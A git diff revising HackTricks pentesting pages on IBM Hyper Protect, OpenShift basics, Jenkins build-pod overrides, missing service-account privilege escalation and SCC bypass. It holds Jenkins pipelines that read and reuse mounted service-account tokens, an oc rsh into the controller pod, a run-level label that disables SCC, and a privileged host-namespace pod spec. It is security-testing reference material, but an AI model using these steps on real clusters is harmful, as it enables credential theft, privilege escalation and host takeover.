+Because VPC trusted-profile selection depends on enabling the metadata service, the normal metadata-based compute identity flow is not available to an HPVS instance. **User data is supported**, but an instance created from the Hyper Protect Container Runtime image must receive its deployment contract through the User Data field; the locked-down image disables SSH, so the contract is the deployment interface.<sup>[[2]](#references)[[5]](#references)</sup>
+
+Ordinary Virtual Servers for VPC differ: compatible images can use cloud-init user data, the metadata service can be enabled, and a trusted profile can then be selected and linked. Do not infer those capabilities merely because an HPVS workload is also a VPC virtual server.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ### IBM Z and LinuxONE
 
-If you don't understand this terms chatGPT can help you understanding them.
+**IBM Z** is IBM's enterprise mainframe family and supports several operating systems, including Linux. **IBM LinuxONE** is the Linux-optimized server platform based on the same `s390x`/z/Architecture ecosystem. Both support Linux virtualization through logical partitions, z/VM, and KVM.<sup>[[6]](#references)</sup>
 
-**IBM Z is a family of mainframe computers** developed by IBM. These systems are designed for **high-performance, high-availability, and high-security** enterprise computing. IBM Z is known for its ability to handle large-scale transactions and data processing workloads.
-
-**LinuxONE is a line of IBM Z** mainframes that are optimized for **running Linux** workloads. LinuxONE systems support a wide range of open-source software, tools, and applications. They provide a highly secure and scalable platform for running mission-critical workloads such as databases, analytics, and machine learning.
-
-**LinuxONE** is built on the **same hardware** platform as **IBM Z**, but it is **optimized** for **Linux** workloads. LinuxONE systems support multiple virtual servers, each of which can run its own instance of Linux. These virtual servers are isolated from each other to ensure maximum security and reliability.
+For HPVS, the important platform capability is Secure Execution: it extends protection beyond data at rest and in transit to data in use inside a KVM guest.<sup>[[3]](#references)</sup>
 
 ### LinuxONE vs x64
 
-LinuxONE is a family of mainframe computers developed by IBM that are optimized for running Linux workloads. These systems are designed for high levels of security, reliability, scalability, and performance.
+LinuxONE uses the `s390x` architecture rather than x86-64, so operating-system images and native binaries must support that architecture.<sup>[[2]](#references)[[6]](#references)</sup> Relevant platform differences include:
 
-Compared to x64 architecture, which is the most common architecture used in servers and personal computers, LinuxONE has some unique advantages. Some of the key differences are:
+1. **Scalability:** IBM Z and LinuxONE can consolidate thousands of virtual machines or containers on one system.<sup>[[6]](#references)</sup>
+2. **Security:** Secure Execution isolates KVM workloads from the host environment, and current generations add transparent memory encryption.<sup>[[3]](#references)</sup>
+3. **Reliability:** The platform is designed for enterprise resiliency and workload consolidation.<sup>[[6]](#references)</sup>
+4. **Performance:** Workload colocation and the platform's processors can benefit some transaction-heavy or data-serving workloads, but performance should be validated for the specific application rather than assumed from the architecture alone.<sup>[[6]](#references)</sup>
 
-1. **Scalability**: LinuxONE can support massive amounts of processing power and memory, which makes it ideal for large-scale workloads.
-2. **Security**: LinuxONE has built-in security features that are designed to protect against cyber threats and data breaches. These features include hardware encryption, secure boot, and tamper-proof virtualization.
-3. **Reliability**: LinuxONE has built-in redundancy and failover capabilities that help ensure high availability and minimize downtime.
-4. **Performance**: LinuxONE can deliver high levels of performance for workloads that require large amounts of processing power, such as big data analytics, machine learning, and AI.
+## References
 
-Overall, LinuxONE is a powerful and secure platform that is well-suited for running large-scale, mission-critical workloads that require high levels of performance and reliability. While x64 architecture has its own advantages, it may not be able to provide the same level of scalability, security, and reliability as LinuxONE for certain workloads.\\
+- [1] [Products in Confidential Services Platform](https://cloud.ibm.com/docs/confidential-computing?topic=confidential-computing-hyper-protect-products)
+- [2] [Creating virtual server instances](https://cloud.ibm.com/docs/vpc?locale=en&topic=vpc-creating-virtual-servers)
+- [3] [What is IBM Secure Execution?](https://www.ibm.com/docs/en/linux-on-systems?topic=execution-introduction)
+- [4] [Securing your data on Hyper Protect Virtual Servers for VPC](https://cloud.ibm.com/docs/vpc?topic=vpc-hyper-protect-virtual-server-mng-data)
+- [5] [User data](https://cloud.ibm.com/docs/vpc?topic=vpc-user-data)
+- [6] [Linux on IBM Z mainframe](https://www.ibm.com/products/z/linux)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/openshift-pentesting/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/README.md
@@ -1,7 +1,5 @@
 # OpenShift Pentesting
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
 {{#ref}}
@@ -20,6 +18,6 @@ openshift-scc.md
 openshift-privilege-escalation/
 {{#endref}}
 
-
+## References
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
@@ -1,8 +1,6 @@
 # OpenShift - Basic information
 
-{{#include ../../banners/hacktricks-training.md}}
-
-## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>
+## Kubernetes prior basic knowledge
 
 Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes.
 
@@ -10,37 +8,34 @@ Before working with OpenShift, ensure you are comfortable with the Kubernetes en
 
 ### Introduction
 
-OpenShift is Red Hat’s container application platform that offers a superset of Kubernetes features. OpenShift has stricter security policies. For instance, it is forbidden to run a container as root. It also offers a secure-by-default option to enhance security. OpenShift, features an web console which includes a one-touch login page.
+OpenShift Container Platform is Red Hat's Kubernetes-based platform for developing and running containerized applications. In addition to Kubernetes, it provides platform services for tasks such as networking, monitoring, logging, and upgrades. Its browser-based web console can be used to inspect and manage projects.<sup>[[1]](#references)[[2]](#references)</sup>
+
+OpenShift does not categorically forbid containers from running as root. Whether a workload can select a particular user ID or use privileged and host features depends on the Security Context Constraint (SCC) available to its user or service account; restrictive SCCs require a UID from a namespace-allocated range, while the `privileged` SCC permits any user ID.<sup>[[4]](#references)</sup>
 
 #### CLI
 
-OpenShift come with a it's own CLI, that can be found here:
+OpenShift provides the `oc` CLI for accessing and managing a cluster. It supports interactive login, username/password credentials, access tokens, and browser-assisted login. A logged-in web-console user can also select **Copy login command** to generate an `oc login` command containing the server and token.<sup>[[3]](#references)</sup>
 
-{{#ref}}
-https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html
-{{#endref}}
-
-To login using the CLI:
+To log in with explicit credentials or a bearer token:
 
 ```bash
-oc login -u=<username> -p=<password> -s=<server>
-oc login -s=<server> --token=<bearer token>
+oc login https://api.cluster.example:6443 --username="$USERNAME" --password="$PASSWORD"
+oc login https://api.cluster.example:6443 --token="$TOKEN"
 ```
 
-### **OpenShift - Security Context Constraints** <a href="#a94e" id="a94e"></a>
+### OpenShift - Security Context Constraints
 
-In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access.
+RBAC controls which API operations a subject may perform. OpenShift Security Context Constraints separately control what an admitted pod may do and which resources it may access.<sup>[[4]](#references)</sup>
 
-SCC is a policy object that has special rules that correspond with the infrastructure itself, unlike RBAC that has rules that correspond with the Platform. It helps us define what Linux access-control features the container should be able to request/run. Example: Linux Capabilities, SECCOMP profiles, Mount localhost dirs, etc.
+An SCC defines the conditions a pod must satisfy to be accepted. It can govern privileged containers, privilege escalation, Linux capabilities, host-directory volumes, SELinux contexts, user IDs, host namespaces and networking, `FSGroup` and supplemental groups, root-filesystem write access, volume types, and seccomp profiles.<sup>[[4]](#references)</sup>
 
-{{#ref}}
-openshift-scc.md
-{{#endref}}
+See [OpenShift SCC](openshift-scc.md) for enumeration and abuse techniques.
 
-{{#ref}}
-https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints
-{{#endref}}
+## References
 
-
+- [1] [OpenShift Container Platform overview](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html-single/overview/index)
+- [2] [Accessing the OpenShift web console](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/web_console/web-console)
+- [3] [OpenShift CLI (oc)](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/cli_tools/openshift-cli-oc)
+- [4] [Managing security context constraints](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/managing-pod-security-policies)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
@@ -1,38 +1,39 @@
 # OpenShift - Jenkins
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
-This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster
+This page outlines security-testing paths for a Jenkins deployment that uses Kubernetes or OpenShift build agents.
 
 ## Disclaimer
 
-A Jenkins instance can be deployed in both Openshift or Kubernetes cluster. Depending in your context, you may need to adapt any shown payload, yaml or technique. For more information about attacking Jenkins you can have a look at [this page](../../../pentesting-ci-cd/jenkins-security/index.html)
+The Jenkins Kubernetes plugin can provision build agents as pods in Kubernetes and OpenShift clusters.<sup>[[2]](#references)</sup> Adapt the shown YAML and techniques to the authorized target. For general Jenkins testing, see [Jenkins Security](../../../pentesting-ci-cd/jenkins-security/index.html).
 
 ## Prerequisites
 
-1a. User access in a Jenkins instance OR 1b. User access with write permission to an SCM repository where an automated build is triggered after a push/merge
+One of the following is required:
+
+- Permission to configure or run a Jenkins Pipeline.
+- Permission to modify trusted SCM content that an automated Jenkins build consumes.
 
 ## How it works
 
-Fundamentally, almost everything behind the scenes works the same as a regular Jenkins instance running in a VM. The main difference is the overall architecture and how builds are managed inside an openshift (or kubernetes) cluster.
+Fundamentally, Jenkins retains the controller/agent model used in a regular Jenkins instance running in a VM: the controller orchestrates work and agents execute build steps. The main difference here is the overall architecture and how builds are managed inside an OpenShift (or Kubernetes) cluster: the Kubernetes plugin provisions Jenkins agents as pods, while the controller may run inside or outside the cluster.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Builds
 
-When a build is triggered, it is first managed/orchestrated by the Jenkins master node then delegated to an agent/slave/worker. In this context, the master node is just a regular pod running in a namespace (which might be different that the one where workers run). The same applies for the workers/slaves, however they destroyed once the build finished whereas the master always stays up. Your build is usually run inside a pod, using a default pod template defined by the Jenkins admins.
+When a build is triggered, it is first managed/orchestrated by the Jenkins controller (historically called the master) then delegated to an agent/worker. In this context, the controller and agents may run as pods, and the configured agent namespace can differ from the controller's deployment. Agent pods are normally stopped after each build, and ephemeral pod templates are deleted after the pipeline execution; retention is configurable. Your build is usually run inside a pod, using a default pod template defined by the Jenkins admins.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Triggering a build
 
-You have multiples main ways to trigger a build such as:
+You have multiple main ways to trigger a build such as:
 
 1. You have UI access to Jenkins
 
-A very easy and convenient way is to use the Replay functionality of an existing build. It allows you to replay a previously executed build while allowing you to update the groovy script. This requires privileges on a Jenkins folder and a predefined pipeline. If you need to be stealthy, you can delete your triggered builds if you have enough permission.
+The Replay functionality of an existing Pipeline build lets a user rerun a prior build after editing its Groovy script. This requires a predefined Pipeline and the relevant Jenkins permissions on its job or folder; `Run/Replay` permits a new Pipeline build with an edited script, while `Job/Build` can permit rerunning the same definition.<sup>[[3]](#references)[[4]](#references)</sup> Manually deleting an individual build requires `Run/Delete`.<sup>[[4]](#references)</sup> Do not assume that deleting it also removes separate SCM, controller, or external audit records.
 
 2. You have write access to the SCM and automated builds are configured via webhook
 
-You can just edit a build script (such as Jenkinsfile), commit and push (eventually create a PR if builds are only triggered on PR merges). Keep in mind that this path is very noisy and need elevated privileges to clean your tracks.
+You can edit a build definition such as a `Jenkinsfile`, then commit and push it or submit it through the repository's required review flow. Jenkins can receive repository notifications and trigger polling or builds, while a `Jenkinsfile` in source control can define Pipeline builds for branches and pull requests.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ## Jenkins Build Pod YAML override
 
@@ -40,6 +41,13 @@ You can just edit a build script (such as Jenkinsfile), commit and push (eventua
 openshift-jenkins-build-overrides.md
 {{#endref}}
 
+## References
 
+- [1] [Using Jenkins agents](https://www.jenkins.io/doc/book/using/using-agents/)
+- [2] [Kubernetes plugin for Jenkins](https://plugins.jenkins.io/kubernetes/)
+- [3] [Pipeline Development Tools](https://www.jenkins.io/doc/book/pipeline/development/)
+- [4] [Permissions](https://www.jenkins.io/doc/book/security/access-control/permissions/)
+- [5] [Git plugin](https://plugins.jenkins.io/git)
+- [6] [Pipeline](https://www.jenkins.io/doc/book/pipeline/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
@@ -1,16 +1,14 @@
-# Jenkins in Openshift - build pod overrides
-
-{{#include ../../../banners/hacktricks-training.md}}
+# Jenkins in OpenShift - build pod overrides
 
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
 ## Kubernetes plugin for Jenkins
-This plugin is mostly responsible of Jenkins core functions inside an openshift/kubernetes cluster. Official documentation [here](https://plugins.jenkins.io/kubernetes/)
-It offers a few functionnalities such as the ability for developers to override some default configurations of a jenkins build pod.
 
-## Core functionnality
+The Jenkins Kubernetes plugin creates dynamic Jenkins agents as Kubernetes pods, including on OpenShift. Pipeline authors can use pod templates and YAML to customize pod fields, containers, images, commands, namespaces, service accounts, and volumes.<sup>[[1]](#references)</sup>
 
-This plugin allows flexibility to developers when building their code in adequate environment.
+## Core functionality
+
+The `podTemplate` step lets a pipeline define an ephemeral build environment and execute steps in a selected container.<sup>[[1]](#references)</sup>
 
 ```groovy
 podTemplate(yaml: '''
@@ -40,8 +38,9 @@ podTemplate(yaml: '''
 
 ## Some abuses leveraging pod yaml override
 
-It can however be abused to use any accessible image such as Kali Linux and execute arbritrary commands using preinstalled tools from that image.
-In the example below we can exfiltrate the serviceaccount token of the running pod.
+If an untrusted pipeline can control the pod YAML, it can select any image the cluster can pull and execute commands using tools available in that image.<sup>[[1]](#references)</sup>
+
+When service account token automounting is enabled, Kubernetes provides the pod with the assigned service account's credentials. The example below reads the token from its standard mounted path.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```groovy
 podTemplate(yaml: '''
@@ -50,17 +49,17 @@ podTemplate(yaml: '''
     spec:
       containers:
       - name: kali
-        image: myregistry/mykali_image:1.0
+        image: registry.example/pentest/tooling:1.0
         command:
         - sleep
         args:
         - 1d
 ''') {
   node(POD_LABEL) {
-    stage('Evil build') {
+    stage('Authorized security test') {
       container('kali') {
-        stage('Extract openshift token') {
-          sh 'cat /run/secrets/kubernetes.io/serviceaccount/token'
+        stage('Inspect the OpenShift identity') {
+          sh 'cat /var/run/secrets/kubernetes.io/serviceaccount/token'
         }
       }
     }
@@ -68,7 +67,7 @@ podTemplate(yaml: '''
 }
 ```
 
-A different synthax to achieve the same goal.
+A declarative pipeline can define the agent pod with the `yaml` field as well.<sup>[[1]](#references)</sup>
 
 ```groovy
 pipeline { 
@@ -80,7 +79,7 @@ pipeline {
                     spec:  
                         containers:
                         - name: kali-container
-                          image: myregistry/mykali_image:1.0
+                          image: registry.example/pentest/tooling:1.0
                           imagePullPolicy: IfNotPresent
                           command:
                           - sleep
@@ -102,7 +101,8 @@ pipeline {
 }
 ```
 
-Sample to override the namespace of the pod
+The pod template also supports selecting a namespace. Whether this succeeds depends on the Jenkins Kubernetes credential's permission to create pods there.<sup>[[1]](#references)</sup>
+
 ```groovy
 pipeline { 
     stages {
@@ -110,12 +110,12 @@ pipeline {
             agent {
                 kubernetes {
                 yaml """
-                	metadata:
-                		namespace: RANDOM-NAMESPACE
+                    metadata:
+                        namespace: example-workloads
                     spec:  
                         containers:
                         - name: kali-container
-                          image: myregistry/mykali_image:1.0
+                          image: registry.example/pentest/tooling:1.0
                           imagePullPolicy: IfNotPresent
                           command:
                           - sleep
@@ -137,7 +137,7 @@ pipeline {
 }
 ```
 
-Another example which tries mounting a serviceaccount (which may have more permissions than the default one, running your build) based on its name. You may need to guess or enumerate existing serviceaccounts first.
+Another option is to request a different service account, which might have more permissions than the account normally assigned to build pods. In Pod YAML, set `spec.serviceAccountName`; if admission allows the pod, Kubernetes supplies that account's credentials unless token automounting is disabled.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```groovy
 pipeline { 
@@ -147,10 +147,10 @@ pipeline {
                 kubernetes {
                 yaml """
                     spec:
-                    	serviceAccount: MY_SERVICE_ACCOUNT
+                        serviceAccountName: build-audit-sa
                         containers:
                         - name: kali-container
-                          image: myregistry/mykali_image:1.0
+                          image: registry.example/pentest/tooling:1.0
                           imagePullPolicy: IfNotPresent
                           command:
                           - sleep
@@ -172,29 +172,29 @@ pipeline {
 }
 ```
 
-The same technique applies to try mounting a Secret. The end goal here would be to figure out how to configure your pod build to effectively pivot or gain privileges.
+Pod templates can also define Secret-backed volumes and environment variables. The end goal is to identify which pod customizations are admitted and whether they expose credentials or other paths for privilege escalation.<sup>[[1]](#references)</sup>
 
 ## Going further
 
-Once you get used to play around with it, use your knowledge on Jenkins and Kubernetes/Openshift to find misconfigurations / abuses.
+Use your knowledge of Jenkins, Kubernetes, and OpenShift to find misconfigurations and abuse paths.
 
 Ask yourself the following questions:
 
 - Which service account is being used to deploy build pods?
-- What roles and permissions does it have? Can it read secrets of the namespace I am currently in?
-- Can I further enumerate other build pods?
-- From a compromised sa, can I execute commands on the master node/pod?
-- Can I further enumerate the cluster to pivot elsewhere?
+- What roles and permissions does it have? Can it read Secrets in the current namespace?
+- Can I enumerate other build pods?
+- From a compromised service account, can I execute commands in the Jenkins controller pod?
+- Can I enumerate the cluster to identify other authorized test paths?
 - Which SCC is applied?
 
 You can find out which oc/kubectl commands to issue [here](../openshift-basic-information.md) and [here](../../kubernetes-security/kubernetes-enumeration.md).
 
 ### Possible privesc/pivoting scenarios
 
-Let's assume that during your assessment you found out that all jenkins builds run inside a namespace called _worker-ns_. You figured out that a default serviceaccount called _default-sa_ is mounted on the build pods, however it does not have so many permissions except read access on some resources but you were able to identify an existing service account called _master-sa_.
-Let's also assume that you have the oc command installed inside the running build container.
+Assume that Jenkins builds run inside a namespace called _worker-ns_. A service account called _build-sa_ is assigned to the build pods and has limited read access, but you identified another service account called _controller-sa_. Also assume that the `oc` command is installed inside the running build container.
 
-With the below build script you can take control of the _master-sa_ serviceaccount and enumerate further.
+The following build script requests _controller-sa_. If the pod is admitted, its mounted token can then be used to enumerate within that service account's RBAC permissions.<sup>[[2]](#references)</sup>
+
 ```groovy
 pipeline { 
     stages {
@@ -203,10 +203,10 @@ pipeline {
                 kubernetes {
                 yaml """
                     spec:
-                    	serviceAccount: master-sa
+                        serviceAccountName: controller-sa
                         containers:
-                        - name: evil
-                          image: random_image:1.0
+                        - name: security-test
+                          image: registry.example/pentest/tooling:1.0
                           imagePullPolicy: IfNotPresent
                           command:
                           - sleep
@@ -218,8 +218,10 @@ pipeline {
             stages {
                 stage('Say hello') {
                     steps {
-                    	sh 'token=$(cat /run/secrets/kubernetes.io/serviceaccount/token)'
-                        sh 'oc --token=$token whoami'
+                        sh '''
+                          token="$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
+                          oc --token="$token" whoami
+                        '''
                     }
                 }
             }
@@ -227,19 +229,20 @@ pipeline {
     }
 }
 ```
-Depending on your access, either you need to continue your attack from the build script or you can directly login as this sa on the running cluster:
-```bash
-oc login --token=$token --server=https://apiserver.com:port
-```
-
-
-If this sa has enough permission (such as pod/exec), you can also take control of the whole jenkins instance by executing commands inside the master node pod, if it's running within the same namespace. You can easily identify this pod via its name and by the fact that it must be mounting a PVC (persistant volume claim) used to store jenkins data.
+From the authorized build container, you can also establish an `oc` session with the mounted token:
 
 ```bash
-oc rsh pod_name -c container_name
+TOKEN="$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
+oc login --token="$TOKEN" --server=https://api.cluster.example:6443
 ```
 
-In case the master node pod is not running within the same namespace as the workers you can try similar attacks by targetting the master namespace. Let's assume its called _jenkins-master_. Keep in mind that serviceAccount master-sa needs to exist on the _jenkins-master_ namespace (and might not exist in _worker-ns_ namespace)
+If this service account has `pods/exec` permission, you can execute commands in the Jenkins controller pod when it is reachable in an authorized namespace. The controller pod may be identifiable by its name and persistent storage mounts. The `oc rsh` command opens a remote shell and supports selecting a specific container with `-c`.<sup>[[4]](#references)</sup>
+
+```bash
+oc rsh -c jenkins pod/jenkins-controller-0
+```
+
+If the Jenkins controller pod is not in the worker namespace, test the same conditions in its namespace only when the Jenkins Kubernetes credential can create pods there. Assume that namespace is called _jenkins-controller_. Service accounts are namespaced, so _controller-sa_ must exist in _jenkins-controller_; an account with the same name in _worker-ns_ is a different object.<sup>[[2]](#references)</sup>
 
 ```groovy
 pipeline { 
@@ -248,13 +251,13 @@ pipeline {
             agent {
                 kubernetes {
                 yaml """
-                	metadata:
-                		namespace: jenkins-master
+                    metadata:
+                        namespace: jenkins-controller
                     spec:
-                    	serviceAccount: master-sa                 
+                        serviceAccountName: controller-sa
                         containers:
-                        - name: evil-build
-                          image: myregistry/mykali_image:1.0
+                        - name: security-test
+                          image: registry.example/pentest/tooling:1.0
                           imagePullPolicy: IfNotPresent
                           command:
                           - sleep
@@ -274,7 +277,13 @@ pipeline {
         }
     }
 }
+```
 
+## References
 
+- [1] [Kubernetes plugin for Jenkins](https://plugins.jenkins.io/kubernetes/)
+- [2] [Kubernetes Service Accounts](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [3] [Accessing the Kubernetes API from a Pod](https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/)
+- [4] [OpenShift Container Platform CLI: oc command reference](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/cli_tools/openshift-cli-oc)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
@@ -1,7 +1,5 @@
 # OpenShift - Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Missing Service Account
 
 {{#ref}}
@@ -20,6 +18,6 @@ openshift-tekton.md
 openshift-scc-bypass.md
 {{#endref}}
 
-
+## References
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
@@ -1,29 +1,34 @@
 # OpenShift - Missing Service Account
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Missing Service Account
 
-It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
+An OpenShift service account is identified by its project and name as `system:serviceaccount:<project>:<name>`. Roles can be granted to that identity through RBAC bindings, while access to a Security Context Constraint (SCC) can be granted directly or through RBAC.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+Preconfigured templates and stale cluster objects can therefore leave a RoleBinding, ClusterRoleBinding, or SCC grant referring to a service account that does not yet exist. A RoleBinding can name a missing account in its existing project; a cluster-scoped ClusterRoleBinding or direct SCC grant can also name an account in a project that does not yet exist. If an attacker can create the referenced service account—or, for a cluster-scoped reference, first create the missing project—the resulting identity matches the existing grant and receives its role or SCC permissions. OpenShiftGrapher documents this dangling-reference attack pattern and represents the missing objects as `AbsentProject` and `AbsentServiceAccount` nodes.<sup>[[4]](#references)[[5]](#references)</sup>
+
+{% hint style="warning" %}
+Creating the service account does not, by itself, guarantee that the attacker can authenticate as it. Exploitation also requires a way to use the account, such as permission to create a workload under it or to create a `serviceaccounts/token` TokenRequest. OpenShift 4.16 and later no longer create a long-lived API-token Secret automatically for each new service account.<sup>[[2]](#references)[[6]](#references)</sup>
+{% endhint %}
 
 <figure><img src="../../../images/openshift-missing-service-account-image1.png" alt=""><figcaption></figcaption></figure>
 
-In the previous graph we got multiple AbsentProject meaning multiple project that appears in Roles Bindings or SCC but are not yet created in the cluster. In the same vein we also got an AbsentServiceAccount.
+The graph above shows several missing projects referenced by authorization relationships, as well as a missing service account. Creating the project and account with the exact referenced names can activate those pre-existing grants and lead to privilege escalation.<sup>[[4]](#references)[[5]](#references)</sup>
 
-If we can create a project and the missing SA in it, the SA will inherited from the Role or the SCC that were targeting the AbsentServiceAccount. Which can lead to privilege escalation.
-
-The following example show a missing SA which is granted node-exporter SCC:
+The following example shows a missing service account that can use the `node-exporter` SCC:
 
 <figure><img src="../../../images/openshift-missing-service-account-image2.png" alt=""><figcaption></figcaption></figure>
 
 ## Tools
 
-The following tool can be use to enumerate this issue and more generally to graph an OpenShift cluster:
+The maintained OpenShiftGrapher project enumerates OpenShift objects and relationships in Neo4j. Its documented queries include paths from absent projects and service accounts to cluster roles and usable SCCs.<sup>[[5]](#references)</sup>
 
-{{#ref}}
-https://github.com/maxDcb/OpenShiftGrapher
-{{#endref}}
+## References
 
-
+- [1] [Using RBAC Authorization - Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [2] [Understanding and creating service accounts - OpenShift Container Platform 4.22](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/understanding-and-creating-service-accounts)
+- [3] [Managing security context constraints - OpenShift Container Platform 4.22](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/managing-pod-security-policies)
+- [4] [OpenShiftGrapher - original repository](https://github.com/maxDcb/OpenShiftGrapher)
+- [5] [OpenShiftGrapher - maintained repository](https://github.com/AmadeusITGroup/OpenShiftGrapher)
+- [6] [Role Based Access Control Good Practices - Kubernetes](https://kubernetes.io/docs/concepts/security/rbac-good-practices/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
@@ -1,12 +1,10 @@
 # Openshift - SCC bypass
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Privileged Namespaces
 
-By default, SCC does not apply on following projects :
+The following default projects are highly privileged, and functionality that depends on admission plugins, including SCC admission, does not work in them:<sup>[[1]](#references)</sup>
 
 - **default**
 - **kube-system**
@@ -15,33 +13,35 @@ By default, SCC does not apply on following projects :
 - **openshift-infra**
 - **openshift**
 
-If you deploy pods within one of those namespaces, no SCC will be enforced, allowing for the deployment of privileged pods or mounting of the host file system.
+Do not run workloads in or grant untrusted users access to these namespaces. A user who can create pods there can request security-sensitive settings such as privileged containers and host filesystem mounts without SCC admission rejecting them.<sup>[[1]](#references)</sup>
 
 ## Namespace Label
 
-There is a way to disable the SCC application on your pod according to RedHat documentation. You will need to have at least one of the following permission :
+The `openshift.io/run-level` namespace label is reserved for internal OpenShift components. Red Hat warns that setting it causes SCCs not to be applied to pods in that namespace, leaving its workloads highly privileged.<sup>[[1]](#references)</sup> Exploiting this behavior requires at least one of the following permission combinations:
 
-- Create a Namespace and Create a Pod on this Namespace
-- Edit a Namespace and Create a Pod on this Namespace
+- Permission to create namespaces and to create pods in the newly created namespace.
+- Permission to patch or update an existing namespace and to create pods in that namespace.
 
 ```bash
 $ oc auth can-i create namespaces
   yes
 
-$ oc auth can-i patch namespaces
+$ NAMESPACE=example-workloads
+$ oc auth can-i patch namespace/"$NAMESPACE"
+  yes
+
+$ oc auth can-i create pods -n "$NAMESPACE"
   yes
 ```
-
-The specific label`openshift.io/run-level` enables users to circumvent SCCs for applications. As per RedHat documentation, when this label is utilized, no SCCs are enforced on all pods within that namespace, effectively removing any restrictions.
 
 <figure><img src="../../../images/Openshift-RunLevel4.png" alt=""><figcaption></figcaption></figure>
 
 ## Add Label
 
-To add the label in your namespace :
+To add the label to a test namespace:
 
 ```bash
-$ oc label ns MYNAMESPACE openshift.io/run-level=0
+$ oc label namespace example-workloads openshift.io/run-level=0
 ```
 
 To create a namespace with the label through a YAML file:
@@ -50,33 +50,32 @@ To create a namespace with the label through a YAML file:
 apiVersion: v1
 kind: Namespace
 metadata:
-  name: evil
+  name: example-workloads
   labels:
-    openshift.io/run-level: 0
+    openshift.io/run-level: "0"
 ```
 
-Now, all new pods created on the namespace should not have any SCC
+New pods created in the namespace should not have an SCC annotation:
 
-<pre class="language-bash"><code class="lang-bash"><strong>$ oc get pod -o yaml | grep 'openshift.io/scc'
-</strong><strong>$                                            
-</strong></code></pre>
+```bash
+$ oc get pod scc-test-pod -o jsonpath='{.metadata.annotations.openshift\.io/scc}{"\n"}'
 
-In the absence of SCC, there are no restrictions on your pod definition. This means that a malicious pod can be easily created to escape onto the host system.
+```
+
+Without SCC admission, the pod is not constrained by SCC controls such as privileged-container, privilege-escalation, host-namespace, and host-volume restrictions.<sup>[[1]](#references)</sup> A malicious pod can therefore request the settings needed to access the host.
 
 ```yaml
 apiVersion: v1
 kind: Pod
 metadata:
-  name: evilpod
-  labels:
-    kubernetes.io/hostname: evilpod
+  name: scc-test-pod
 spec:
-  hostNetwork: true #Bind pod network to the host network
-  hostPID: true #See host processes
-  hostIPC: true #Access host inter processes
+  hostNetwork: true # Bind the pod to the host network.
+  hostPID: true # See host processes.
+  hostIPC: true # Access the host IPC namespace.
   containers:
-    - name: evil
-      image: MYIMAGE
+    - name: security-test
+      image: registry.example/pentest/tooling:1.0
       imagePullPolicy: IfNotPresent
       securityContext:
         privileged: true
